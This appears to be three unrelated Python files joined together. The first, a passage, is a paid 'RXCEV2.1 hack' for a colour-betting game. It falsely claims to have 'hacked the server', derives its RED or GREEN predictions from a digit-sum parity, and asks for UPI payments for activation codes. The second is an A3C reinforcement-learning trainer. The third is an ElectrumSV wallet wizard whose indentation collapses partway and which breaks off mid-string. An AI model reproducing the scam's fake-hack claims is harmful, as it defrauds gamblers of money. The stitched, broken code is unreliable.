            _ = system('clear')

    def getSum(n):
        """Sum of the decimal digits of *n*."""
        total = 0
        for digit in str(n):
            total += int(digit)
        return total

    clear()
    y = 1
    newperiod = period  # global ``period`` is set by the caller
    banner = 'figlet RXCEV2.1|lolcat'
    numbers = []
    while y:
        clear()
        system(banner)
        print(f"{red}Contact me on telegram @smsn_knt")
        print(f"{yellow}Enter ", newperiod, " Bcone Price :")
        current = input()
        current = int(current)
        chalo()
        print("\n---------Successfully hacked the server-----------")
        chalo1()
        print("\n---------Successfully got the colour -------------")
        print('\n')
        # NOTE: both parity branches are identical, so the period parity
        # has no actual effect on the printed "prediction".
        if newperiod % 2 == 0:
            total = getSum(current)
            if total % 2 == 0:
                print(newperiod + 1, " : 🔴, RED")
            else:
                print(newperiod + 1, " : 🟢, GREEN")
        else:
            total = getSum(current)
            if total % 2 == 0:
                print(newperiod + 1, " : 🔴, RED")
            else:
                print(newperiod + 1, " : 🟢, GREEN")
        newperiod += 1
        numbers.append(current)
        y = input("Do you want to play : Press 1 and 0 to exit \n")
        # BUGFIX: input() returns a string, so the original `y == 0`
        # comparison never matched and entering 0 could not exit the loop.
        if y == "0":
            y = False
        if len(numbers) > 11:
            clear()
            system('figlet Thank you!!')
            print("Play on next specified time!!")
            print("-----------Current Time UP----------")
            sys.exit(" \n \n \n Contact on Telegram @smsn_knt")
# Main gate: before the hard-coded expiry date run the "licensed" flow,
# afterwards demand an activation code.
if(expirydate>today):
    now = datetime.datetime.now()
    # Pre-computed session windows for today (First/Firstend etc. are the
    # start/end of each play slot).
    First = now.replace(hour=13, minute=55, second=0, microsecond=0)
    Firstend = now.replace(hour=14, minute=35, second=0, microsecond=0)
    Second = now.replace(hour=16, minute=25, second=0, microsecond=0)
    Secondend = now.replace(hour=17, minute=35, second=0, microsecond=0)
    Third = now.replace(hour=15, minute=55, second=0, microsecond=0)
    Thirdend = now.replace(hour=16, minute=35, second=0, microsecond=0)
    Final = now.replace(hour=17, minute=55, second=0, microsecond=0)
    Finalend = now.replace(hour=18, minute=35, second=0, microsecond=0)
    if (now>Third and now<Thirdend):
        period=320
        hero()
    # NOTE(review): `elif(now):` is always truthy (a datetime is truthy),
    # so the elif(False) branches and the else below are unreachable.
    elif(now):
        period=340
        hero()
    elif(False):
        period=340
        hero()
    elif(False):
        period=360
        hero()
    else:
        banner='figlet RXCEV2.1'
        system(banner)
        #print(f"{red}"Hi!! Thanks for buying the hack")
        print("Hi! thanks for trying our DEMO")
        print("----------Your play time-----------")
        #print("31st Aug 2021, 11:00 AM- 11:30 AM")
        #print("31st Aug 2021, 02:00 PM- 02:30 PM")
        print("23rd Sept 2021, 04:00 PM- 04:30 PM")
        #print("31st Aug 2021, 08:00 PM- 08:30 PM")
        print("Please play on the given time, and ")
        print("If you think it is an error contact")
        print("  admin on telegram @smsn_knt     ")
else:
    # Expired: demand an activation code before running hero().
    def clear():
        # for windows
        if name == 'nt':
            _ = system('cls')
        # for mac and linux(here, os.name is 'posix')
        else:
            _ = system('clear')

    # Accepted activation codes.
    code="BART983"
    test="PBHGY32"
    night="NICMJY13"
    nextday="NNMKJHFD"
    banner='figlet RXCEV2.1|lolcat'
    rava=0
    now = datetime.datetime.now()
    Second = now.replace(hour=10, minute=55, second=0, microsecond=0)
    Secondend = now.replace(hour=14, minute=55, second=0, microsecond=0)
    Third = now.replace(hour=15, minute=30, second=0, microsecond=0)
    Thirdend = now.replace(hour=18, minute=34, second=0, microsecond=0)
    Final = now.replace(hour=18, minute=35, second=0, microsecond=0)
    Finalend = now.replace(hour=22, minute=35, second=0, microsecond=0)
    # Pick the starting period number for the current time slot.
    if(now>Second and now<Secondend):
        rava=290
    elif(now>Third and now<Thirdend):
        rava=350
    elif(now>Final and now<Finalend):
        rava=410
    system(banner)
    print(f"{neon}*--------*--------*-------*---------*---------*")
    print("Your hack has expired--- Please contact")
    print(" on telegram ----@smsn_knt for activating")
    print("     Plan Amount -- Total limit  " )
    print("  1. 1000 INR  ------- 1 Day (30 Games")
    print("  2. 2500 INR  ------- 3 Days(90 Games")
    print("  2. 5000 INR  ------- 7 Days(210 Games")
    print("*---------*----------*-------------*----------*")
    print("If you need any discount contact me")
    print("Beware of fraudsters!!!")
    while(True):
        print("My banking name is SUNNY KUMAR")
        print(f"{red}After You Pay to The UPI ID above You Can Automatically")
        print(f"Activate Hack By Entering The Correct ")
        print(f"{green}(UTR) Or Upi Reference Number")
        print(f"{neon}To Activate The Hack")
        print(f"If It Does'nt Open Contact Me On Telegram {yellow}@smsn_knt")
        print(f"{neon}*---------*----------*-------------*----------*")
        print(f"{red}*---------*----------*-------------*----------*")
        print("payhere--- UPI : ")
        print(f"{yellow}UPI1 : sunny.9132@ybl")
        print("UPI2 : sunnyk16@fbl")
        print("If you have already paid to above UPI")
        print(f"{neon}Enter Your Activation Code Or Upi Reference for Opening Hack")
        bhai=input(": ")
        if(bhai==code or bhai==test):
            clear()
            print(f"{purple}---------------Your play time----------------")
            print("13th Jan 2021, 02:30 PM- 03:00 PM")
            print("13th Jan 2021, 05:30 PM- 06:00 PM")
            print("13th Jan 2021, 08:30 PM- 09:00 PM")
            print("Please play on the given time, and ")
            print(f"If you think it is an {red}error {yellow}contact {green}me ")
            print(f"{neon}On Telegram {red}@smsn_knt")
            print("wait.... starting....")
            time.sleep(20)
            period=rava
            hero()
            #print("Today Server is off RXCE try tomorrow ")
            #rint(" of town, Tomorrow It will work as usual.")
            #print(" Thank You!!")
            #rint("To all the weekly members next week, cost will be ")
            #print(" 4000 INR , because in this week 2 days off " )
            #print("Thank You!! ")
            sys.exit(" \n \n \n Contact on Telegram @smsn_knt")
        elif(bhai==nextday):
            clear()
            banner='figlet RXCEV2.1|lolcat'
            system(banner)
            print("----------Your play time-----------")
            print("8th-14th Dec 2021, 02:30 PM- 03:00 PM")
            print("8th-14th Dec 2021, 06:00 PM- 06:30 PM")
            print("8th-14th Dec 2021, 08:30 PM- 09:00 PM")
            print("Please play on the given time, and ")
            print("If you think it is an error contact")
            print("wait.... starting....")
            time.sleep(20)
            period=rava
            hero()
            #period("Sorry too many people(>20) using hack in same time ")
            sys.exit(" \n \n \n Contact on Telegram @smsn_knt")
        elif(bhai==night):
            clear()
            print("----------Your play time-----------")
            print("9th Dec 2021, 08:30 PM- 09:00 PM")
            print("10th Dec 2021, 08:30 PM- 09:00 PM")
            print("11th Dec 2021, 08:30 PM- 09:00 PM")
            print("Please play on the given time, and ")
            print("If you think it is an error contact")
            print("wait.... starting....")
            time.sleep(20)
            period=410
            hero()
            sys.exit(" \n \n \n Contact on Telegram @smsn_knt")
        else:
            clear()
            banner='figlet RXCEV2.1|lolcat'
            system(banner)
            print("Incorrect Activation Code :")
|
a3c.py | # -*- coding: utf-8 -*-
import tensorflow as tf
import threading
import numpy as np
import signal
import random
import math
import os
import time
from game_ac_network import GameACFFNetwork, GameACLSTMNetwork
from a3c_training_thread import A3CTrainingThread
from rmsprop_applier import RMSPropApplier
from constants import ACTION_SIZE
from constants import PARALLEL_SIZE
from constants import INITIAL_ALPHA_LOW
from constants import INITIAL_ALPHA_HIGH
from constants import INITIAL_ALPHA_LOG_RATE
from constants import MAX_TIME_STEP
from constants import CHECKPOINT_DIR
from constants import LOG_FILE
from constants import RMSP_EPSILON
from constants import RMSP_ALPHA
from constants import GRAD_NORM_CLIP
from constants import USE_GPU
from constants import USE_LSTM
def log_uniform(lo, hi, rate):
  """Interpolate between lo and hi on a log scale.

  rate=0 yields lo, rate=1 yields hi; intermediate rates interpolate
  geometrically (log-linearly) between the two bounds. Used to sample
  the initial learning rate as in the A3C paper.
  """
  return math.exp((1.0 - rate) * math.log(lo) + rate * math.log(hi))
# Pin graph construction to a single device; GPU only when configured.
device = "/cpu:0"
if USE_GPU:
  device = "/gpu:0"

# Sample the shared initial learning rate log-uniformly between the bounds.
initial_learning_rate = log_uniform(INITIAL_ALPHA_LOW,
                                    INITIAL_ALPHA_HIGH,
                                    INITIAL_ALPHA_LOG_RATE)

global_t = 0            # global step counter, advanced by all worker threads
stop_requested = False  # set by the SIGINT handler to stop the workers

# Shared (global) network that every worker thread synchronises with.
if USE_LSTM:
  global_network = GameACLSTMNetwork(ACTION_SIZE, -1, device)
else:
  global_network = GameACFFNetwork(ACTION_SIZE, -1, device)

training_threads = []

# Learning rate is fed per step so it can be annealed over time.
learning_rate_input = tf.placeholder("float")

# Single RMSProp optimizer state shared by all workers.
grad_applier = RMSPropApplier(learning_rate = learning_rate_input,
                              decay = RMSP_ALPHA,
                              momentum = 0.0,
                              epsilon = RMSP_EPSILON,
                              clip_norm = GRAD_NORM_CLIP,
                              device = device)

for i in range(PARALLEL_SIZE):
  training_thread = A3CTrainingThread(i, global_network, initial_learning_rate,
                                      learning_rate_input,
                                      grad_applier, MAX_TIME_STEP,
                                      device = device)
  training_threads.append(training_thread)

# prepare session
sess = tf.Session(config=tf.ConfigProto(log_device_placement=False,
                                        allow_soft_placement=True))
init = tf.global_variables_initializer()
sess.run(init)

# summary for tensorboard
score_input = tf.placeholder(tf.int32)
tf.summary.scalar("score", score_input)
summary_op = tf.summary.merge_all()
summary_writer = tf.summary.FileWriter(LOG_FILE, sess.graph)

# init or load checkpoint with saver
saver = tf.train.Saver()
checkpoint = tf.train.get_checkpoint_state(CHECKPOINT_DIR)
if checkpoint and checkpoint.model_checkpoint_path:
  saver.restore(sess, checkpoint.model_checkpoint_path)
  print("checkpoint loaded:", checkpoint.model_checkpoint_path)
  tokens = checkpoint.model_checkpoint_path.split("-")
  # set global step -- checkpoint paths look like ".../checkpoint-<step>"
  global_t = int(tokens[1])
  print(">>> global step set: ", global_t)
  # set wall time: restore accumulated wall-clock time so that any
  # time-based scheduling resumes where the previous run stopped
  wall_t_fname = CHECKPOINT_DIR + '/' + 'wall_t.' + str(global_t)
  with open(wall_t_fname, 'r') as f:
    wall_t = float(f.read())
else:
  print("Could not find old checkpoint")
  # set wall time
  wall_t = 0.0
def train_function(parallel_index):
  """Worker loop executed by one training thread.

  Repeatedly runs the worker's A3C update, advancing the shared global
  step, until either MAX_TIME_STEP is exceeded or a stop was requested
  via Ctrl+C.
  """
  global global_t
  worker = training_threads[parallel_index]
  # Resume the wall clock from where a restored checkpoint left off.
  worker.set_start_time(time.time() - wall_t)
  while not stop_requested and global_t <= MAX_TIME_STEP:
    advanced = worker.process(sess, global_t, summary_writer,
                              summary_op, score_input)
    global_t += advanced
def signal_handler(signal, frame):
  """SIGINT handler: flag all worker loops to exit at their next check."""
  global stop_requested
  stop_requested = True
  print('You pressed Ctrl+C!')
# One OS thread per parallel actor-learner.
train_threads = []
for i in range(PARALLEL_SIZE):
  train_threads.append(threading.Thread(target=train_function, args=(i,)))

signal.signal(signal.SIGINT, signal_handler)

# set start time (offset by restored wall time so elapsed time accumulates
# across restarts)
start_time = time.time() - wall_t

for t in train_threads:
  t.start()

print('Press Ctrl+C to stop')
# Block the main thread until a signal arrives (the SIGINT handler sets
# stop_requested, which makes the workers exit their loops).
signal.pause()

print('Now saving data. Please wait')

for t in train_threads:
  t.join()

if not os.path.exists(CHECKPOINT_DIR):
  os.mkdir(CHECKPOINT_DIR)

# write wall time so the next run can resume its elapsed-time accounting
wall_t = time.time() - start_time
wall_t_fname = CHECKPOINT_DIR + '/' + 'wall_t.' + str(global_t)
with open(wall_t_fname, 'w') as f:
  f.write(str(wall_t))

saver.save(sess, CHECKPOINT_DIR + '/' + 'checkpoint', global_step = global_t)
|
installwizard.py | import os
import shutil
import threading
from PyQt5.QtCore import Qt, pyqtSignal, QEventLoop, QRect
from PyQt5.QtGui import QPalette, QPen, QPainter
from PyQt5.QtWidgets import (
QWidget, QDialog, QLabel, QPushButton, QScrollArea, QHBoxLayout, QVBoxLayout, QListWidget,
QAbstractItemView, QListWidgetItem, QLineEdit, QFileDialog, QMessageBox, QSlider,
QGridLayout
)
from electrumsv.app_state import app_state
from electrumsv.base_wizard import BaseWizard
from electrumsv.exceptions import UserCancelled, InvalidPassword
from electrumsv.i18n import _
from electrumsv.logs import logs
from electrumsv.platform import platform
from electrumsv.storage import WalletStorage
from electrumsv.util import get_electron_cash_user_dir
from electrumsv.wallet import Wallet
from .network_dialog import NetworkChoiceLayout
from .password_dialog import PasswordLayout, PW_NEW, PasswordLineEdit
from .seed_dialog import SeedLayout, KeysLayout
from .util import MessageBoxMixin, Buttons, WWLabel, ChoicesLayout, read_QIcon
logger = logs.get_logger('wizard')
class GoBack(Exception):
    """Raised by wizard pages to signal that the user pressed the Back button."""
    pass
# User-facing message templates for the wizard pages, translated via gettext.
MSG_GENERATING_WAIT = _("ElectrumSV is generating your addresses, please wait...")
MSG_ENTER_ANYTHING = _("Please enter a seed phrase, a master key, a list of "
                       "Bitcoin addresses, or a list of private keys")
MSG_ENTER_SEED_OR_MPK = _("Please enter a seed phrase or a master key (xpub or xprv):")
MSG_COSIGNER = _("Please enter the master public key of cosigner #{}:")
MSG_ENTER_PASSWORD = _("Choose a password to encrypt your wallet keys.") + '\n'\
                     + _("Leave this field empty if you want to disable encryption.")
MSG_RESTORE_PASSPHRASE = \
    _("Please enter your seed derivation passphrase. "
      "Note: this is NOT your encryption password. "
      "Leave this field empty if you did not use one or are unsure.")
class CosignWidget(QWidget):
    """Pie-chart widget visualising an m-of-n multi-signature setup.

    Draws n pie slices; the first m are green (required signatures) and
    the rest grey (remaining cosigners).
    """
    # Fixed square edge length of the widget, in pixels.
    size = 120

    def __init__(self, m, n):
        QWidget.__init__(self)
        self.R = QRect(0, 0, self.size, self.size)
        self.setGeometry(self.R)
        self.setMinimumHeight(self.size)
        self.setMaximumHeight(self.size)
        self.m = m  # number of required signatures (green slices)
        self.n = n  # total number of cosigners (total slices)

    def set_n(self, n):
        # Update the cosigner count and request a repaint.
        self.n = n
        self.update()

    def set_m(self, m):
        # Update the required-signature count and request a repaint.
        self.m = m
        self.update()

    def paintEvent(self, event):
        # Separate the slices with a thick pen in the background colour.
        bgcolor = self.palette().color(QPalette.Background)
        pen = QPen(bgcolor, 7, Qt.SolidLine)
        qp = QPainter()
        qp.begin(self)
        qp.setPen(pen)
        qp.setRenderHint(QPainter.Antialiasing)
        qp.setBrush(Qt.gray)
        for i in range(self.n):
            # QPainter.drawPie takes angles in 1/16ths of a degree.
            alpha = int(16* 360 * i/self.n)
            alpha2 = int(16* 360 * 1/self.n)
            qp.setBrush(Qt.green if i<self.m else Qt.gray)
            qp.drawPie(self.R, alpha, alpha2)
        qp.end()
import functools

def wizard_dialog(func):
    """Decorator for InstallWizard page methods.

    Relabels the Back button (Back vs Cancel depending on history), runs the
    page, converts GoBack into navigation and UserCancelled into a silent
    return, and finally forwards the page's result to the ``run_next``
    continuation (normalised to a tuple of positional arguments).
    """
    # FIX: wrap with functools.wraps so the decorated page keeps its own
    # __name__/__doc__ (useful for logging and debugging) instead of all
    # pages appearing as "func_wrapper".
    @functools.wraps(func)
    def func_wrapper(*args, **kwargs):
        run_next = kwargs.get('run_next')
        wizard = args[0]
        # On the first page there is nothing to go back to: show "Cancel".
        wizard.back_button.setText(_(MSG_BUTTON_BACK) if wizard.can_go_back()
                                   else _(MSG_BUTTON_CANCEL))
        try:
            out = func(*args, **kwargs)
        except GoBack:
            if wizard.can_go_back():
                wizard.go_back()
            else:
                wizard.close()
            return
        except UserCancelled:
            return
        if run_next is not None:
            # Normalise single return values so run_next(*out) always works.
            if type(out) is not tuple:
                out = (out,)
            run_next(*out)
    return func_wrapper
# Button labels; passed through _() at display time so translations apply.
MSG_BUTTON_NEXT = "Next"
MSG_BUTTON_BACK = "Back"
MSG_BUTTON_CANCEL = "Cancel"
# WindowModalDialog must come first as it overrides show_error
# NOTE(review): the class below actually derives from QDialog, not
# WindowModalDialog -- this ordering note looks stale; confirm.
class InstallWizard(QDialog, MessageBoxMixin, BaseWizard):
accept_signal = pyqtSignal()
synchronized_signal = pyqtSignal(str)
    def __init__(self, storage):
        """Build the wizard dialog: buttons, scrollable content area, event loop."""
        BaseWizard.__init__(self, storage)
        QDialog.__init__(self, None)
        self.setWindowTitle('ElectrumSV')
        self.setWindowIcon(read_QIcon("electrum-sv.png"))
        self.language_for_seed = app_state.config.get('language')
        self.setMinimumSize(600, 420)
        self.accept_signal.connect(self.accept)
        self.back_button = QPushButton(_(MSG_BUTTON_BACK), self)
        self.back_button.setText(_(MSG_BUTTON_BACK) if self.can_go_back() else _(MSG_BUTTON_CANCEL))
        self.next_button = QPushButton(_(MSG_BUTTON_NEXT), self)
        self.next_button.setDefault(True)
        self.icon_filename = None
        # Nested event loop driven by the buttons. Exit codes used throughout
        # the wizard: 0 = rejected/cancelled, 1 = back, 2 = next.
        self.loop = QEventLoop()
        self.rejected.connect(lambda: self.loop.exit(0))
        self.back_button.clicked.connect(lambda: self.loop.exit(1))
        self.next_button.clicked.connect(lambda: self.loop.exit(2))
        # Page content lives inside a scroll area between title and buttons.
        self.scroll_widget = QWidget()
        self.scroll_widget.setLayout(self.create_template_layout())
        scroll = QScrollArea()
        scroll.setWidget(self.scroll_widget)
        scroll.setHorizontalScrollBarPolicy(Qt.ScrollBarAlwaysOff)
        scroll.setWidgetResizable(True)
        outer_vbox = QVBoxLayout(self)
        outer_vbox.addWidget(scroll)
        outer_vbox.addLayout(Buttons(self.back_button, self.next_button))
        self.show()
        self.raise_()
        self.refresh_gui()  # Need for QT on MacOSX. Lame.
def create_template_layout(self):
"""
The standard layout divides creates a three part template.
"""
self.title = QLabel()
self.main_widget = QWidget()
self.please_wait = QLabel(_("Please wait..."))
self.please_wait.setAlignment(Qt.AlignCenter)
vbox = QVBoxLayout()
vbox.addWidget(self.title)
vbox.addWidget(self.main_widget)
vbox.addStretch(1)
vbox.addWidget(self.please_wait)
vbox.addStretch(1)
return vbox
def start_gui(self, is_startup=False):
if is_startup:
self._copy_electron_cash_wallets()
return self.run_and_get_wallet()
def _copy_electron_cash_wallets(self):
"""
Work out whether we should show UI to offer to copy the user's
Electron Cash wallets to their ElectrumSV wallet directory, and
if so, show it and give them the chance.
"""
def ignore_wallet_file(wallet_path):
if os.path.isdir(wallet_path):
return True
if wallet_path.startswith("."):
return True
return False
def count_user_wallets(wallets_path):
if os.path.exists(wallets_path):
filenames = [filename for filename in os.listdir(wallets_path)
if not ignore_wallet_file(os.path.join(wallets_path, filename))]
return len(filenames)
return 0
# If the user has ElectrumSV wallets already, we do not offer to copy the one's
# Electron Cash has.
esv_wallets_dir = os.path.join(platform.user_dir(), "wallets")
if count_user_wallets(esv_wallets_dir) > 0:
return
ec_wallets_dir = get_electron_cash_user_dir(esv_wallets_dir)
ec_wallet_count = count_user_wallets(ec_wallets_dir)
# If the user does not have Electron Cash wallets to copy, there's no point in offering.
if ec_wallet_count == 0:
return
def update_summary_label():
selection_count = len(file_list.selectedItems())
if selection_count == 0:
summary_label.setText(_("No wallets are selected / will be copied."))
elif selection_count == 1:
summary_label.setText(_("1 wallet is selected / will be copied."))
else:
summary_label.setText(_("%d wallets are selected / will be copied.")
% selection_count)
wallet_filenames = sorted(os.listdir(ec_wallets_dir), key=lambda s: s.lower())
file_list = QListWidget()
file_list.setSelectionMode(QAbstractItemView.ExtendedSelection)
for filename in wallet_filenames:
if not ignore_wallet_file(os.path.join(ec_wallets_dir, filename)):
file_list.addItem(QListWidgetItem(filename))
file_list.itemSelectionChanged.connect(update_summary_label)
vbox = QVBoxLayout()
introduction_label = QLabel(
_("Your Electron Cash wallet directory was found. If you want ElectrumSV to import "
"any of them on your behalf, select the ones you want copied from the list below "
"before clicking the Next button."))
introduction_label.setWordWrap(True)
vbox.setSpacing(20)
vbox.addWidget(introduction_label)
vbox.addWidget(file_list)
summary_label = QLabel()
update_summary_label()
vbox.addWidget(summary_label)
self._set_standard_layout(vbox, title=_('Import Electron Cash wallets'))
v = self.loop.exec_()
# Cancel, exit application.
if v == -1:
raise UserCancelled()
if v != 2:
raise GoBack()
# If the user selected any files, then we copy them before exiting to the next page.
for item in file_list.selectedItems():
filename = item.text()
source_path = os.path.join(ec_wallets_dir, filename)
target_path = os.path.join(esv_wallets_dir, filename)
try:
shutil.copyfile(source_path, target_path)
except shutil.Error:
# For now we ignore copy errors.
pass
def run_and_get_wallet(self):
vbox = QVBoxLayout()
hbox = QHBoxLayout()
hbox.addWidget(QLabel(_('Wallet') + ':'))
self.name_e = QLineEdit()
hbox.addWidget(self.name_e)
button = QPushButton(_('Choose...'))
hbox.addWidget(button)
vbox.addLayout(hbox)
self.msg_label = QLabel('')
vbox.addWidget(self.msg_label)
hbox2 = QHBoxLayout()
self.pw_e = PasswordLineEdit()
self.pw_e.setMinimumWidth(200)
self.pw_label = QLabel(_('Password') + ':')
self.pw_label.setAlignment(Qt.AlignTop)
hbox2.addWidget(self.pw_label)
hbox2.addWidget(self.pw_e)
hbox2.addStretch()
vbox.addLayout(hbox2)
self._set_standard_layout(vbox,
title=_('ElectrumSV wallet'),
back_text=_(MSG_BUTTON_CANCEL))
wallet_folder = os.path.dirname(self.storage.path)
def on_choose():
path, __ = QFileDialog.getOpenFileName(self, "Select your wallet file", wallet_folder)
if path:
self.name_e.setText(path)
def on_filename(filename):
path = os.path.join(wallet_folder, filename)
try:
self.storage = WalletStorage(path, manual_upgrades=True)
self.next_button.setEnabled(True)
except IOError:
self.storage = None
self.next_button.setEnabled(False)
if self.storage:
if not self.storage.file_exists():
msg =_("This file does not exist.") + '\n' \
+ _("Press 'Next' to create this wallet, or choose another file.")
pw = False
elif self.storage.file_exists() and self.storage.is_encrypted():
msg = '\n'.join([
_("This file is encrypted."),
_('Enter your password or choose another file.'),
])
pw = True
else:
msg = _("Press 'Next' to open this wallet.")
pw = False
else:
msg = _('Cannot read file')
pw = False
self.msg_label.setText(msg)
if pw:
self.pw_label.show()
self.pw_e.show()
self.pw_e.setFocus()
else:
self.pw_label.hide()
self.pw_e.hide()
button.clicked.connect(on_choose)
self.name_e.textChanged.connect(on_filename)
n = os.path.basename(self.storage.path)
self.name_e.setText(n)
while True:
if self.storage.file_exists() and not self.storage.is_encrypted():
break
if self.loop.exec_() != 2: # 2 = next
return
if not self.storage.file_exists():
break
if self.storage.file_exists() and self.storage.is_encrypted():
password = self.pw_e.text()
try:
self.storage.decrypt(password)
self.pw_e.setText('')
break
except InvalidPassword as e:
QMessageBox.information(None, _('Error'), str(e))
continue
except Exception as e:
logger.exception("decrypting storage")
QMessageBox.information(None, _('Error'), str(e))
return
path = self.storage.path
if self.storage.requires_split():
self.hide()
msg = _("The wallet '{}' contains multiple accounts, which are not supported.\n\n"
"Do you want to split your wallet into multiple files?").format(path)
if not self.question(msg):
return
file_list = '\n'.join(self.storage.split_accounts())
msg = (_('Your accounts have been moved to') + ':\n' + file_list + '\n\n' +
_('Do you want to delete the old file') + ':\n' + path)
if self.question(msg):
os.remove(path)
self.show_warning(_('The file was removed'))
return
if self.storage.requires_upgrade():
self.hide()
msg = _("The format of your wallet '%s' must be upgraded for ElectrumSV. "
"This change will not be backward compatible" % path)
if not self.question(msg):
return
self.storage.upgrade()
self.wallet = Wallet(self.storage)
return self.wallet
action = self.storage.get_action()
if action and action != 'new':
self.hide()
msg = _("The file '{}' contains an incompletely created wallet.\n"
"Do you want to complete its creation now?").format(path)
if not self.question(msg):
if self.question(_("Do you want to delete '{}'?").format(path)):
os.remove(path)
self.show_warning(_('The file was removed'))
return
self.show()
if action:
# self.wallet is set in run
self.run(action)
return self.wallet
self.wallet = Wallet(self.storage)
return self.wallet
def finished(self):
"""Called in hardware client wrapper, in order to close popups."""
return
def on_error(self, exc_info):
if not isinstance(exc_info[1], UserCancelled):
logger.exception("")
self.show_error(str(exc_info[1]))
def _remove_layout_from_widget(self, widget):
"""
The only way to remove a layout from a first widget, is to transfer it to a second one.
This needs to be done, to be able to set a new layout on the first widget.
"""
existing_layout = widget.layout()
QWidget().setLayout(existing_layout)
def _set_layout(self, layout, next_enabled=True, back_text=None):
"""
Set a layout that is in control of the whole display area.
"""
self._remove_layout_from_widget(self.scroll_widget)
self.scroll_widget.setLayout(layout)
self.back_button.setEnabled(True)
if back_text is not None:
self.back_button.setText(back_text)
self.next_button.setEnabled(next_enabled)
if next_enabled:
self.next_button.setFocus()
def _set_standard_layout(self, layout, title=None, next_enabled=True, back_text=None):
"""
Ensure the standard template layout is in place.
And put the current stage's sub-layout in the defined place.
"""
self._remove_layout_from_widget(self.scroll_widget)
self.scroll_widget.setLayout(self.create_template_layout())
self.title.setText("<b>%s</b>"%title if title else "")
self.title.setVisible(bool(title))
self.main_widget.setLayout(layout)
if back_text is None:
self.back_button.setText(_(MSG_BUTTON_BACK))
else:
self.back_button.setText(back_text)
self.back_button.setEnabled(True)
self.next_button.setText(_(MSG_BUTTON_NEXT))
self.next_button.setEnabled(next_enabled)
if next_enabled:
self.next_button.setFocus()
self.main_widget.setVisible(True)
self.please_wait.setVisible(False)
def exec_layout(self, layout, title=None, raise_on_cancel=True,
next_enabled=True):
self._set_standard_layout(layout, title, next_enabled)
result = self.loop.exec_()
if not result and raise_on_cancel:
raise UserCancelled
if result == 1:
raise GoBack
self.title.setVisible(False)
self.back_button.setEnabled(False)
self.next_button.setEnabled(False)
self.main_widget.setVisible(False)
self.please_wait.setVisible(True)
self.refresh_gui()
return result
def refresh_gui(self):
# For some reason, to refresh the GUI this needs to be called twice
app_state.app.processEvents()
app_state.app.processEvents()
def remove_from_recently_open(self, filename):
app_state.config.remove_from_recently_open(filename)
def text_input(self, title, message, is_valid, allow_multi=False):
slayout = KeysLayout(parent=self, title=message, is_valid=is_valid,
allow_multi=allow_multi)
self.exec_layout(slayout, title, next_enabled=False)
return slayout.get_text()
def seed_input(self, title, message, is_seed, options):
slayout = SeedLayout(title=message, is_seed=is_seed, options=options, parent=self)
self.exec_layout(slayout, title, next_enabled=False)
return slayout.get_seed(), slayout.is_bip39, slayout.is_ext
@wizard_dialog
def add_xpub_dialog(self, title, message, is_valid, run_next, allow_multi=False):
return self.text_input(title, message, is_valid, allow_multi)
@wizard_dialog
def add_cosigner_dialog(self, run_next, index, is_valid):
title = _("Add Cosigner") + " %d"%index
message = ' '.join([
_('Please enter the master public key (xpub) of your cosigner.'),
_('Enter their master private key (xprv) if you want to be able to sign for them.')
])
return self.text_input(title, message, is_valid)
@wizard_dialog
def restore_seed_dialog(self, run_next, test):
options = []
if self.opt_ext:
options.append('ext')
if self.opt_bip39:
options.append('bip39')
title = _('Enter Seed')
message = _('Please enter your seed phrase in order to restore your wallet.')
return self.seed_input(title, message, test, options)
@wizard_dialog
def confirm_seed_dialog(self, run_next, test):
app_state.app.clipboard().clear()
title = _('Confirm Seed')
message = ' '.join([
_('Your seed is important!'),
_('If you lose your seed, your money will be permanently lost.'),
_('To make sure that you have properly saved your seed, please retype it here.')
])
seed, is_bip39, is_ext = self.seed_input(title, message, test, None)
return seed
@wizard_dialog
def show_seed_dialog(self, run_next, seed_text):
title = _("Your wallet generation seed is:")
slayout = SeedLayout(seed=seed_text, title=title, msg=True, options=['ext'])
self.exec_layout(slayout)
return slayout.is_ext
def pw_layout(self, msg, kind):
playout = PasswordLayout(None, msg, kind, self.next_button)
playout.encrypt_cb.setChecked(True)
self.exec_layout(playout.layout())
return playout.new_password(), playout.encrypt_cb.isChecked()
@wizard_dialog
def request_password(self, run_next):
"""Request the user enter a new password and confirm it. Return
the password or None for no password."""
return self.pw_layout(MSG_ENTER_PASSWORD, PW_NEW)
def show_restore(self, wallet, network):
# FIXME: these messages are shown after the install wizard is
# finished and the window closed. On MacOSX they appear parented
# with a re-appeared ghost install wizard window...
if network:
def task():
wallet.wait_until_synchronized()
if wallet.is_found():
msg = _("Recovery successful")
else:
msg = _("No transactions found for this seed")
self.synchronized_signal.emit(msg)
self.synchronized_signal.connect(self.show_message)
t = threading.Thread(target = task)
t.daemon = True
t.start()
else:
msg = _("This wallet was restored offline. It may "
"contain more addresses than displayed.")
self.show_message(msg)
@wizard_dialog
def confirm_dialog(self, title, message, run_next):
self.confirm(message, title)
def confirm(self, message, title):
label = WWLabel(message)
vbox = QVBoxLayout()
vbox.addWidget(label)
self.exec_layout(vbox, title)
@wizard_dialog
def action_dialog(self, action, run_next):
self.run(action)
def terminate(self):
self.accept_signal.emit()
def waiting_dialog(self, task, msg):
self.please_wait.setText(MSG_GENERATING_WAIT)
self.refresh_gui()
t = threading.Thread(target = task)
t.start()
t.join()
@wizard_dialog
def choice_dialog(self, title, message, choices, run_next):
c_values = [x[0] for x in choices]
c_titles = [x[1] for x in choices]
clayout = ChoicesLayout(message, c_titles)
vbox = QVBoxLayout()
vbox.addLayout(clayout.layout())
self.exec_layout(vbox, title)
action = c_values[clayout.selected_index()]
return action
def query_choice(self, msg, choices):
"""called by hardware wallets"""
clayout = ChoicesLayout(msg, choices)
vbox = QVBoxLayout()
vbox.addLayout(clayout.layout())
self.exec_layout(vbox, '')
return clayout.selected_index()
@wizard_dialog
def line_dialog(self, run_next, title, message, default, test, warning=''):
vbox = QVBoxLayout()
vbox.addWidget(WWLabel(message))
line = QLineEdit()
line.setText(default)
def f(text):
self.next_button.setEnabled(test(text))
line.textEdited.connect(f)
vbox.addWidget(line)
vbox.addWidget(WWLabel(warning))
self.exec_layout(vbox, title, next_enabled=test(default))
return ' '.join(line.text().split())
@wizard_dialog
def show_xpub_dialog(self, xpub, run_next):
msg = ' '.join([
_("Here is your master public key."),
_("Please share it with your cosigners.")
])
vbox = QVBoxLayout()
layout = SeedLayout(xpub, title=msg, icon=False)
vbox.addLayout(layout.layout())
self.exec_layout(vbox, _('Master Public Key'))
return None
def init_network(self, network):
message = _("ElectrumSV communicates with remote servers to get "
"information about your transactions and addresses. The "
"servers all fulfil the same purpose only differing in "
"hardware. In most cases you simply want to let ElectrumSV "
"pick one at random. However if you prefer feel free to "
